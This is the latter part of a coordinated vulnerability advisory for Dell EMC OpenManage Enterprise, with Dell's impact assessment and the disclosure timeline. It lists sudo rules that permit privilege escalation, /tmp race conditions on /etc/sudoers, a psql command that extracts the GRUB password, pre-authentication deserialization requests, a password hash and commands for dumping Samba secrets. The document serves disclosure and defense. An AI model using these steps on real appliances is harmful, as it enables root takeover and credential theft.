/usr/bin/gpg,/opt/dell/mcsi/appliance/scripts/pam/config_user_access.sh,/opt/dell/mcsi/appliance/scripts/port_validation.sh,/opt/dell/mcsi/appliance/scripts/change_timezone.py,/opt/dell/mcsi/appliance/scripts/restore_application.py,/opt/dell/mcsi/appliance/scripts/certificate_tool.py,/opt/dell/mcsi/appliance/scripts/change_hostname.py,/opt/dell/mcsi/appliance/scripts/address_configuration.py,/opt/dell/mcsi/appliance/scripts/current_network_settings.py,
/usr/bin/lscpu,/usr/bin/free,/opt/dell/mcsi/appliance/scripts/ntp_tool.py,/opt/dell/mcsi/appliance/scripts/dump_logs.py,/opt/dell/mcsi/appliance/scripts/change_webconfig.py,/opt/dell/mcsi/appliance/scripts/branding.py,/usr/bin/systemctl,/usr/bin/date,/usr/bin/ntpstat,/usr/sbin/ntpq,/usr/bin/python,/usr/sbin/ntpdc

At least `/usr/bin/mount`, `/usr/bin/cp`, `/usr/bin/gpg`,
`/usr/bin/systemctl` and `/usr/bin/python` can be used to elevate to
root.



## Details - Multiple Local Privilege Escalations from group `mcsitasksvc`

Users belonging to group `mcsitasksvc` can sudo:

%mcsitasksvc ALL=NOPASSWD:/usr/bin/mount, /usr/bin/cp,
/usr/bin/umount,
/usr/bin/gpg,/opt/dell/mcsi/appliance/scripts/pam/config_user_access.sh,/opt/dell/mcsi/appliance/scripts/port_validation.sh,/opt/dell/mcsi/appliance/scripts/change_timezone.py,/opt/dell/mcsi/appliance/scripts/restore_application.py,/opt/dell/mcsi/appliance/scripts/certificate_tool.py,/opt/dell/mcsi/appliance/scripts/change_hostname.py,/opt/dell/mcsi/appliance/scripts/address_configuration.py,/opt/dell/mcsi/appliance/scripts/virtual_ip_configuration.py,/opt/dell/mcsi/appliance/scripts/current_network_settings.py,
/usr/bin/lscpu,/usr/bin/free,/opt/dell/mcsi/appliance/scripts/ntp_tool.py,/opt/dell/mcsi/appliance/scripts/dump_logs.py,/opt/dell/mcsi/appliance/scripts/change_webconfig.py,/opt/dell/mcsi/appliance/scripts/branding.py,/usr/bin/systemctl,/usr/bin/date,/usr/bin/ntpstat,/usr/sbin/ntpq,/usr/bin/python3,/usr/sbin/ntpdc,/opt/dell/mcsi/appliance/scripts/configureSSHDTimeout.sh,/opt/dell/mcsi/appliance/scripts/resolve.sh,/usr/bin/nmcli
%mcsitasksvc
ALL=NOPASSWD:/opt/dell/omc/utilities/cifsconfiguration/bin/reset_cifs_password.sh,
/opt/dell/omc/utilities/cifsconfiguration/bin/test_cifs_config.sh,
/usr/bin/smbpasswd, /usr/bin/systemctl

At least `/usr/bin/mount`, `/usr/bin/cp`, `/usr/bin/gpg`,
`/usr/bin/systemctl` and `/usr/bin/python3` can be used to elevate to
root.



## Details - Multiple Local Privilege Escalations from group `tomcat`

Users belonging to group `tomcat` can sudo:

%tomcat ALL=NOPASSWD:/opt/dell/mcsi/appliance/scripts/ntp_tool.py,/opt/dell/mcsi/appliance/scripts/rsyslog_tool.py,/opt/dell/mcsi/appliance/scripts/change_timezone.py,/opt/dell/mcsi/appliance/scripts/certificate_tool.py,/opt/dell/mcsi/appliance/scripts/change_hostname.py,/opt/dell/mcsi/appliance/scripts/login_iprange.py,/opt/dell/mcsi/appliance/scripts/address_configuration.py,/opt/dell/mcsi/appliance/scripts/current_network_settings.py,/opt/dell/mcsi/appliance/scripts/restore_application.py,/opt/dell/mcsi/appliance/scripts/dump_logs.py,/usr/bin/python3,/opt/dell/mcsi/appliance/scripts/branding.py,/opt/dell/mcsi/appliance/scripts/commandexecutor.sh,/opt/dell/mcsi/appliance/scripts/resolve.sh,/opt/dell/mcsi/appliance/scripts/port_validation.sh,/usr/bin/systemctl,/opt/dell/mcsi/appliance/scripts/change_webconfig.py,/opt/dell/mcsi/appliance/scripts/sysloglogging.py,/usr/bin/date,/usr/bin/ntpstat,/usr/sbin/ntpq,/usr/sbin/ntpdc,/opt/dell/mcsi/appliance/scripts/chassis_nw_settings.py,/
opt/dell/mcsi/appliance/scripts/virtual_ip_configuration.py
%tomcat ALL=NOPASSWD:/usr/bin/mount, /usr/bin/cp, /usr/bin/umount,
/var/consoleupdate/unzip_uploadedfile.py

At least `/usr/bin/python3`, `/usr/bin/systemctl`, `/usr/bin/mount`
and `/usr/bin/cp` can be used to elevate to root.



## Details - Local Privilege Escalation from group `omctui`

Users belonging to group `omctui` can sudo:

%omctui ALL=NOPASSWD:/usr/bin/systemctl,/usr/sbin/shutdown,/usr/bin/localectl

`/usr/bin/systemctl` can be used to elevate to root.



## Details - Multiple TOCTOUs in "security_tool.sh" shell script

`/opt/dell/mcsi/appliance/scripts/security_tool.sh` contains multiple TOCTOUs:

[[email protected] /]# cat
/opt/dell/mcsi/appliance/scripts/security_tool.sh
[...]
456 function turnOffRequireRetty
457 {
458 echo "turning off RequireRetty"
459
460 # make it so the requiretty is commented out.
461 sed 's/Defaults requiretty/#Defaults requiretty/'
/etc/sudoers > /tmp/sudoers.bk
462 mv /tmp/sudoers.bk /etc/sudoers
463 chmod 0440 /etc/sudoers
464 }

In line 461, no check is done on `/tmp/sudoers.bk` - so the file may
already exist with attacker's rights.
Race condition in line 462 - an attacker previously controlling
`/tmp/sudoers.bk` will overwrite `/etc/sudoers`
with its own policies, resulting in a privilege escalation.

This race condition is now located in line 168 in version 3.6.1.

And here:

505 local targets="/usr/bin/python3"
506 targets="${targets},${THIS_DIR}/change_admin_password.sh"
507 targets="${targets},/usr/sbin/passwd"
508 targets="${targets},${THIS_DIR}/change_timezone.py"
509 targets="${targets},${THIS_DIR}/certificate_tool.py"
510
511 # remove existing tomcat permissions from the sudoesrs file
512 sed 's/%admin ALL=NOPASSWD:.*$//' /etc/sudoers > /tmp/sudoers.bk
513 mv /tmp/sudoers.bk /etc/sudoers
514 chmod 0440 /etc/sudoers
515
516 # add new tomcat permissions to the sudoers file
517 echo "%admin ALL=NOPASSWD:${targets}" >> /etc/sudoers


Race condition in line 513 - an attacker controlling `/tmp/sudoers.bk`
will overwrite `/etc/sudoers`
with its own policies, resulting in a privilege escalation.

This race condition is now located in line 220 in version 3.6.1.



## Details - Incorrect access for tomcat

The script `security_tool.sh` contains interesting settings for the
tomcat user, in the function `configureShadowAccess`:

[[email protected] /]# cat
/opt/dell/mcsi/appliance/scripts/security_tool.sh
[...]
466 # this allows rest/shiro to authenticate admin user from
tomcat using the pam database
467 function configureShadowAccess
468 {
469 if ! $(ls -la /etc/shadow | grep -q shadow-readers); then
470 echo "configuring shadow access"
471 groupadd shadow-readers
472 usermod -a -G shadow-readers tomcat <--
tomcat added to group `shadow-readers`
473 chown root:shadow-readers /etc/shadow <--
non-standard permissions for /etc/shadow
474 chmod 640 /etc/shadow
475 service systemd-logind restart
476 else
477 echo "shadow access already configured"
478 fi
479 }

This will allow the `tomcat` user to read the `/etc/shadow` file.

This function is not called in version 3.5 and 3.6.1 but may have been
used before:

573 function configureAccounts
574 {
575 #configureShadowAccess

This function is located in line 174 in version 3.6.1.



## Details - Grub password stored in postgres, without authentication
for local user

The grub password is located in the file `/etc/grub.d/40_custom`.

This file is generated by
`/opt/dell/mcsi/appliance/scripts/set_grub_password.sh`:


[...]
12 pwd="$(/usr/bin/psql -qtAX -U core_admin -d enterprisedb -c
'select guid from core.application_info')"
[...]
28 sed -i "s/password root.*/password root $pwd/g"
/etc/grub.d/40_custom
29 /usr/sbin/grub2-mkconfig -o /boot/grub2/grub.cfg
30 echo GRUB password is updated
[...]

Even if `/etc/grub.d/40_custom` is 755, it is impossible to read the
file because `/etc/grub.d` is 700 `root:root`.

[[email protected] lpe-priv8-3/]# ls -la /etc/grub.d/40_custom
-rwxr-xr-x. 1 root root 288 May 16 04:07 /etc/grub.d/40_custom
[[email protected] lpe-priv8-3/]# ls -la /etc/grub.d | grep ' \.$'
drwx------. 2 root root 4096 Sep 30 2020 .

But it is possible to extract the grub password from the auth-less
local postgres database:

sh-4.2$ /usr/bin/psql -qtAX -U core_admin -d enterprisedb -c
'select guid from core.application_info'
09b50d53-189c-221c-7996-1c0ee1279201

The password can be confirmed by reading `/etc/grub.d/40_custom`:

[[email protected] /]# tail -n 1 /etc/grub.d/40_custom
password root 09b50d53-189c-221c-7996-1c0ee1279201



## Details - Pre-auth and post-auth Java Deserializations

The solution uses `jackson` and `ObjectMapper` to read
attacker-controlled json inputs.

It appears authentification doesn't really work when sending
attacker-controlled data on API endpoints:

- - sending valid authentication cookies and well-formed json/xml will
result in a 200 ok
- - sending valid authentication cookies and bad-formed json/xml will
result in deserialization errors or jackson parsing errors
- - sending well-formed json/xml without valid authentication cookies
will result in a 400 bad request
- - sending bad-formed json/xml without valid authentication cookies
will result in deserialization errors or jackson parsing errors

The authentication system appears to be broken as it parses
attacker-controlled data before checking the authentication.

Sending correct data will trigger the authentication:

kali# wget -O- --no-check-certificate --post-data
'{"targets":["1"],"command":"ls","operation":"REMOTE_SSH_EXEC"}'
--header "Content-Type: application/json;charset=utf-8"
https://192.168.1.100/omc/api/Console/RemoteCommandTask
HTTP request sent, awaiting response... 400 Bad Request
2021-05-16 12:57:17 ERROR 400: Bad Request.

- From the logs:

[ERROR] 2021-05-16 12:57:15.158 [ajp-bio-8009-exec-1]
JobsController -
org.springframework.web.client.HttpClientErrorException: 401
Unauthorized

Now, by replacing the targets field, "1" becomes "a", it is possible
to create deserialization errors
while sending incorrect inputs while creating a RemoteCommandTask:

POST /omc/api/Console/RemoteCommandTask HTTP/1.1
Host: 192.168.1.100
Content-Type: application/json;charset=utf-8
Content-Length: 62

{"targets":["a"],"command":"ls","operation":"REMOTE_SSH_EXEC"}

Or with `wget`:

kali# wget -O- --no-check-certificate --post-data
'{"targets":["a"],"command":"ls","operation":"REMOTE_SSH_EXEC"}'
--header "Content-Type: application/json;charset=utf-8"
https://192.168.1.100/omc/api/Console/RemoteCommandTask
HTTP request sent, awaiting response... 500 Internal Server Error
2021-05-16 12:58:25 ERROR 500: Internal Server Error.

And from the logs, no more "401 Unauthorized" but some deserialization errors:

- From `/var/log/dell/mcsi/tomcat/application.log`:

[ERROR] 2021-05-16 12:58:39.554 [ajp-bio-8009-exec-4]
BaseController -
org.springframework.http.converter.HttpMessageNotReadableException:
JSON parse error: Cannot deserialize value of type `java.lang.Integer`
from String "a": not a valid Integer value; nested exception is
com.fasterxml.jackson.databind.exc.InvalidFormatException: Cannot
deserialize value of type `java.lang.Integer` from String "a": not a
valid Integer value
at [Source: (PushbackInputStream); line: 1, column: 13] (through
reference chain:
com.dell.enterprise.model.omc.RemoteCommandTask["targets"]->java.util.ArrayList[0])
org.springframework.http.converter.HttpMessageNotReadableException:
JSON parse error: Cannot deserialize value of type `java.lang.Integer`
from String "a": not a valid Integer value; nested exception is
com.fasterxml.jackson.databind.exc.InvalidFormatException: Cannot
deserialize value of type `java.lang.Integer` from String "a": not a
valid Integer value
at [Source: (PushbackInputStream); line: 1, column: 13] (through
reference chain:
com.dell.enterprise.model.omc.RemoteCommandTask["targets"]->java.util.ArrayList[0])
[100s of lines]

So it appears this input is deserialized before the authentication
process is done.

We saw this behavior - deserialization or checking of validity of JSON
using jackson without authentication -
in several web forms present in the solution, accepting JSON or XML,
mainly before any authentication.

After some tests, we found 1 form that apparently checks the authentication,
but it is still possible to generate deserialization errors (post-auth):

POST /core/api/Console/oidc/checkRegistration HTTP/1.1
Host: 192.168.1.100
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0)
Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-Requested-With: managementConsole
Content-Length: 24
Origin: https://192.168.1.100
Connection: close
Referer: https://192.168.1.100/core/console/console.html
Cookie: X-Auth-Token=f544973e-4c0e-4522-9b8a-a65498ebccfc

{"oidcServerIds":[a1]}

- From `/var/log/dell/mcsi/tomcat/application.log`:

[ERROR] 2021-05-16 13:12:15.356 [ajp-bio-8009-exec-4]
BaseController -
org.springframework.http.converter.HttpMessageNotReadableException:
JSON parse error: Unrecognized token 'a1': was expecting (JSON String,
Number, Array, Object or token 'null', 'true' or 'false'); nested
exception is com.fasterxml.jackson.databind.JsonMappingException:
Unrecognized token 'a1': was expecting (JSON String, Number, Array,
Object or token 'null', 'true' or 'false')
at [Source: (PushbackInputStream); line: 1, column: 24] (through
reference chain:
com.dell.enterprise.model.ui.OIDCRegistrationStatusList["oidcServerIds"])
org.springframework.http.converter.HttpMessageNotReadableException:
JSON parse error: Unrecognized token 'a1': was expecting (JSON String,
Number, Array, Object or token 'null', 'true' or 'false'); nested
exception is com.fasterxml.jackson.databind.JsonMappingException:
Unrecognized token 'a1': was expecting (JSON String, Number, Array,
Object or token 'null', 'true' or 'false')
[...]
at Caused by:
com.fasterxml.jackson.databind.JsonMappingException: Unrecognized
token 'a1': was expecting (JSON String, Number, Array, Object or token
'null', 'true' or 'false')
[...]
at com.fasterxml.jackson.databind.deser.BeanDeserializerBase.wrapAndThrow(BeanDeserializerBase.java:1714)
~[jackson-databind-2.10.3.jar:2.10.3]
at com.fasterxml.jackson.databind.deser.BeanDeserializer.deserializeFromObject(BeanDeserializer.java:371)
~[jackson-databind-2.10.3.jar:2.10.3]
at com.fasterxml.jackson.databind.deser.BeanDeserializer.deserialize(BeanDeserializer.java:159)
~[jackson-databind-2.10.3.jar:2.10.3]
at com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:4218)
~[jackson-databind-2.10.3.jar:2.10.3]
at com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:3267)
~[jackson-databind-2.10.3.jar:2.10.3]
[...]
at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserialize(CollectionDeserializer.java:277)
~[jackson-databind-2.10.3.jar:2.10.3]
at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserialize(CollectionDeserializer.java:245)
~[jackson-databind-2.10.3.jar:2.10.3]
at com.fasterxml.jackson.databind.deser.std.CollectionDeserializer.deserialize(CollectionDeserializer.java:27)
~[jackson-databind-2.10.3.jar:2.10.3]
at com.fasterxml.jackson.databind.deser.impl.FieldProperty.deserializeAndSet(FieldProperty.java:138)
~[jackson-databind-2.10.3.jar:2.10.3]
at com.fasterxml.jackson.databind.deser.BeanDeserializer.deserializeFromObject(BeanDeserializer.java:369)
~[jackson-databind-2.10.3.jar:2.10.3]
at com.fasterxml.jackson.databind.deser.BeanDeserializer.deserialize(BeanDeserializer.java:159)
~[jackson-databind-2.10.3.jar:2.10.3]
at com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:4218)
~[jackson-databind-2.10.3.jar:2.10.3]
at com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:3267)
~[jackson-databind-2.10.3.jar:2.10.3]
at org.springframework.http.converter.json.AbstractJackson2HttpMessageConverter.readJavaType(AbstractJackson2HttpMessageConverter.java:237)
~[spring-web-4.3.28.RELEASE.jar:4.3.28.RELEASE]
[...]

Due to the lack of interesting java gadgets, we didn't manage to
exploit these deserialization errors.

These pre-auth and post-auth Java deserializations have been silently
patched in version 3.6.1.



## Details - Idrac User

When installing the appliance, an idrac user will be created with a
random password:

[[email protected] /]# cat /etc/shadow
[...]
idrac:$6$QtG/5PHz$1ZW7aSUeLJ6mlQM/sO/g7RLxKNUQrTwksmkJH9/meYkPTlgSvXLrR6CUikYzDg27bvprfm.EgimjX1e3yaxzC1:18763:0:99999:7:::
[[email protected] /]# cat /etc/passwd
[...]
idrac:x:1008:1016::/shared/dell/omc/cifs/idrac:/bin/false

This user may be for samba sharing functionality - we didn't success
to use this functionality
from the management interface - maybe it will be possible to configure
it in the next versions.

Interesting files are:

- - /etc/samba/smb.conf
- - /var/lib/samba/private/passdb.tdb
- - /var/lib/samba/private/secrets.tdb

It is possible to extract configurations with `tdbtool`:
`tdbtool /var/lib/samba/private/secrets.tdb dump` and `tdbtool
/var/lib/samba/private/passdb.tdb dump`



## Researcher comments on Vendor Response

1 point has been considered as a vulnerability by the vendor
("Remote Auth Bypass with 2 pre-auth RCEs in docker instances") because
the attacker is not supposed to get a shell (e.g. with a command injection
or java deserialization) or to access postgres running on the appliance
(via a shell or via the network).

Interestingly, Dell confirmed this vulnerability that is in fact a chain
of multiple "no-impact" vulnerabilities (lack of authentication for postgres,
command execution in redis and in postgres, R/W access to the postgres).

Other issues have not been considered having security impacts.
Dell confirmed postgres does not use authentication and there is no
security impact in a normal situation.

Futhermore, this solution has an history of command injections -
nonetheless the threat model doesn't appear to include command injections
("No shell access or other ingress points available for use.").

2 vulnerabilities have been silently patched by the vendor, one DSA
will be published (java deserialization).



## Vendor Response

The vendor provided an impact assessment and explanations, as shown below:

1. Hardcoded ActiveMQ Credentials -> No impact
ActiveMQ credentials are not used in the appliance. File artifacts
will be removed in a future release and are unused in Dell EMC
OpenManage Enterprise (OME) and Dell EMC OpenManage Enterpise-Modular
(OME-M).
Also, note that the ActiveMQ web console is disabled within OME. In
addition, as confirmed by the researcher, the firewall blocks incoming
access to the relevant ports (46403 / 61616) and SELinux policies
prevent users from reading these files.

2. Harcdoded ActiveMQ credentials for JMX -> No impact
ActiveMQ JMX configuration is disabled. File artifacts will be removed
in a future release and are unused in OME and OME-M. SELinux policies
prevent regular users from reading the contents of these files.

3. Hardcoded ActiveMQ Keystore + password for keystore file (in
jetty.xml) -> No impact
ActiveMQ keystore is not used in OME/OME-M. These artifacts will be
removed in a future release.
SELinux policies prevent regular user read access.

4. Hardcoded JDBC passwords -> No impact
DB configured to allow access only from localhost. Also, the passwords
indicated by the researcher are not used in OME / OME-M. In addition,
(in OME 3.5 and later) SELinux policies add another layer of read
access protection to the files
with these passwords.

5. Hardcoded passwords for core_admin and replicator -> No impact
DB is configured to only allow access from localhost. The passwords
indicated are not used in OME or OME-M and will be removed in a future
release.

6. KeyStore using hardcoded Key -> No impact
SELinux policies and current mitigation in place prevent file system access.

7. Permissive ACL for Postgres -> No impact
The attack vectors of shell access / ingress via Docker are not
available to users - Docker path shut off in original design of
product.

8. Local Privilege Escalation (as postgres) inside postgres docker -> No impact
The attack vectors of shell access / ingress via Docker are not
available to users - Docker path shut off in original design of
product.

9. Remote Auth Bypass with 2 pre-auth RCEs in docker instances -> Impacted
Remediation available in OME version 3.6.2 and OME-M 1.30.10, more
information in Dell Security Advisory -
DSA-2021-113 (https://www.dell.com/support/kbdoc/000189673)

10. Undocumented `system` account -> No impact
User cannot log in to account.

11. Database key stored in the database -> No impact
Postgres is configured to allow access from internal appliance
services - no security impact

12. Weak permission on SSL/TLS Key -> No impact
No shell access for use in exploitation.
As an additional layer of defense, SELinux policies will be reviewed
and updated in future releases.

13. Multiple Local Privilege Escalations from `mcsimetricssvc` -
partially silently patched in version 3.6.1 -> No impact
No shell access or other ingress points available for use.

14. Multiple Local Privilege Escalations from group `mcsitasksvc` -> No impact
No shell access or other ingress points available for use.

15. Multiple Local Privilege Escalations from group `tomcat` -> No impact
No shell access or other ingress points available for use.

16. Local Privilege Escalation from group `omctui` -> No impact
No shell access or other ingress points available for use.

17. Multiple TOCTOUs in "security_tool.sh" shell script -> No impact
Mitigation in place to block shell access by default.

18. Incorrect access for tomcat -> No impact
Debug level script is not used in OME/OME-M and will be removed in
future releases.

19. Grub password stored in postgres, without authentication for local
user -> No impact
Access to postgres for password is only available to users who already
have hypervisor admin privileges.

20. Pre-auth and post-auth Java Deserializations - silently patched in
version 3.6.1 -> No impact
Found in prior internal security audit - issue mitigated in version
3.6.1, more information in Dell Security Advisory - DSA-2021-113
(https://www.dell.com/support/kbdoc/000189673).

21. Idrac User -> No impact
These are credentials to access an internal CIFS share / not a user
that can log in to OME. The passwords are rotated on a time interval
(not configurable) and handed out by OME to clients who in turn need
access to the internal CIFS share. Binary content that can be
introduced on this share is limited to DUPS which are signed /
signature verified by the iDRAC and other entities prior to flashing.
Non-binary content is the SCP profile that is used to configure
systems. The ability to invoke operations that would access the CIFS
share / use content on it is relegated to authenticated high
privileged OME users (admin / Device Manager roles)



## Report Timeline

* July, 2020: Vulnerabilities found and this advisory was written.
Research took =~ 4 days.
* May 14, 2021: Found an interesting tweet about dbutil_2_3.sys
* May 16, 2021: Verification on version 3.5. New vulnerabilities
found, advisory was rewritten.
* June 26, 2021: Verification on version 3.6.1.
* June 26, 2021: Advisory sent to Dell
* June 28, 2021: Dell attributes PSRC-15668
* Jul 14, 2021: Dell replies it is doing final reviews of their
advisory and ask to coordinate disclosure to July 19
* Jul 16, 2021: Pierre replies confirms July 19 and asks Dell to
confirm the "Vendor Response" text
* Jul 19, 2021: A public advisory is sent to security mailing lists.



## Credits

These vulnerabilities were found by Pierre Kim (@PierreKimSec) and
Alexandre Torres (@AlexTorSec).



## References

https://pierrekim.github.io/advisories/2021-dell-openmanage-enterprise-0x00.txt

https://pierrekim.github.io/blog/2021-07-19-dell-openmanage-enterprise-0day-vulnerabilities.html



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmD1OmYACgkQxD4O2n2T
Lbw2HA/9FcwRyBfvOZT+8a5kfvY2q0doMkSp4UIBHw5NENSbjRsnOs2VYt/cN+zb
YNw1MD3SWVd0r2c3U2jbAT0REppNDa4m5A83TKsbzunadBnEoJTDpjBp0TXnyJ9c
M0ghSi0EvvjGm0DmjOD9nUsYpJZftJWuVsTqTeuhSyFyvxaMUHUzKiTcZQS1gKiw
+eeseUhlzFilUicz6IUeV7e5zGZ/lKun8viurPXaxyLY29yWmV77tKCBuP16G60R
Z4JS6I5EOiYsupxckLsY1IRsrmQ3P7SymjEygxwWiQpOdRwu8soe+bXYCruEYG8V
ff6i9pNkgvkdLg3Jm9usXDwBj3+vy0zqHC742p+FeUwgPtLLqvY90GDmw7VkdUNF
KUbeVSfzPB7p0xaxGQ+egxyrOIZBHRBIl29vvP7hdeKvGjyo7035x0Xs04n6kaQM
T71m1qSb+LU6Fd5tm8rD2yXe9e6REUI0Xas7sRPP3WWvYyJNStR9v/bURUdg6GtE
kw7w3siyfGCgoQ8Ct1qWz+v9MCj1anmMih5SI2cm/8WUa7Kk3Zgq0F6tqzlhtXM8
52lUZn2g0gZiXiQ34CxEm9jbslbltGVLDDWV6WVzdmpQN/gsWQ6agPCEW/+KPyIj
+ruWritELTnbKdosXfCV0wRxHxEOEIwl9UQEhOan/hFsjsqMDbs=
=rTFH
-----END PGP SIGNATURE-----

--
Pierre Kim
[email protected]
@PierreKimSec
https://pierrekim.github.io/



Related Posts